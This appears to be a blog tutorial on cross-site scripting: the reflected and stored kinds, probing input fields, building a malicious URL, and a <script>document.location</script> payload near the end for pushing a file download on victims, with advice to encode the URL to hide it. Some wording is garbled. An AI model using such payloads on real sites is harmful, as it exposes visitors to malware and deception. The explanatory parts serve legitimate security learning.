The XSS vulnerability, Cross Site Scripting, discover the advantages of these vulnerabilities, discover the danger they represent and the types of attacks that are possible, from simple user redirection to online file injection !
What is the XSS Vulnerability ?
The XSS or Cross Site Scripting vulnerability is one of the most common vulnerabilities on websites.
This flaw can be avoided, but sometimes web developers don’t pay enough attention to it and don’t clean or check their code, this flaw exists in web forms, comment sections or wherever text input is needed/required.
For example some free WordPress or Prestashop themes are extremely affected by some XSS flaws, developers in such a hurry to sell their theme made in a hurry, don’t care about this phenomenon which is a great threat for customers who buy their themes.
This article is a complement to our previous article : How to hack a website ?
What are the impacts of the XSS Vulnerability ?
It allows the attacker to inject scripts that can compromise the website and lead to the disclosure of confidential information or the theft of cookies that can end up causing account usurpation.
A FEW IMPORTANT TERMS BEFORE MOVING FORWARD :
HTTP REQUEST : Simple enough to understand..
Each time you launch a web page or get a file, your browser makes an http request directed to the website server.
This http request is managed by the web server and responds accordingly.
REQUEST PARAMETERS : A little more complex
This is where the script is injected into most of the common xss fault sites.
Example = http://example.com/test.php?a=1&b=2 In this example “a” and “b” are parameters with the respective values “1” and “2”.
The script is most often injected in the value of the parameter.
XSS Vulnerabilities Types
REFLECTED Vulnerability OR NON-PERSISTANT XSS : This type of vulnerability xss is quite common.
It’s not very dangerous on its own, but when combined with social engineering, it can be deadly. In this type of xss flaw, the payload or script is part of the http request or URL.
Nothing is permanently stored on the web server in this type of xss, it can be used to specifically target a person, it consists of a trusted website link but the link consists of xss vector/script.
XSS Vulnerability : This type of xss is the most dangerous.
In this type of xss vulnerability, the attacker injects a script that remains permanently stored on the web page so that when someone visits this page, the malicious script is executed.
This can do a lot of damage.
This XSS flaw can also be used to disfigure the website (we will talk about this later).
How to find XSS Vulnerabilities on a website ?
So now we have a basic knowledge of XSS and we will go a little further and learn how to identify an XSS flaw in a website.
As you can see on the picture, the site contains an input field.
So, to identify the flaw it allows you to enter a simple script in the input field
This script returns the following response and confirms that there is an xss vulnerability on the site.
To make sure we try to inject one more script in the search field and we can see the result.
This confirms the XSS flaw.
This is a thoughtful type of xss and now the question is how to execute the script from the URL.
We will now analyze the HTTP requests made by the browser when we inject the script. Here are the search parameters.
There are a total of 4 parameters.
We see that the script is injected in the “roll_number” parameter, so if we want the script to be executed from a URL, we’ll have to build a URL like this one
Thus, by executing the URL above, our script is also executed as shown in the image. We can execute any script this way.
How to use an XSS Vulnerability to make a visitor download a file ?
It will be easy once you understand all of the above.
In the URL we built above, if we replace this script with the upload of your file will start.
<script>document.location=”Link o f your file”</script>
The advantage is that the victim thinks that the file comes from a trusted website.
You can encode the url to hide your script in the url.
This tutorial is intended for educational purposes in order to pre-municate against this phenomenon that is increasingly affecting webmasters who are not very concerned about their security.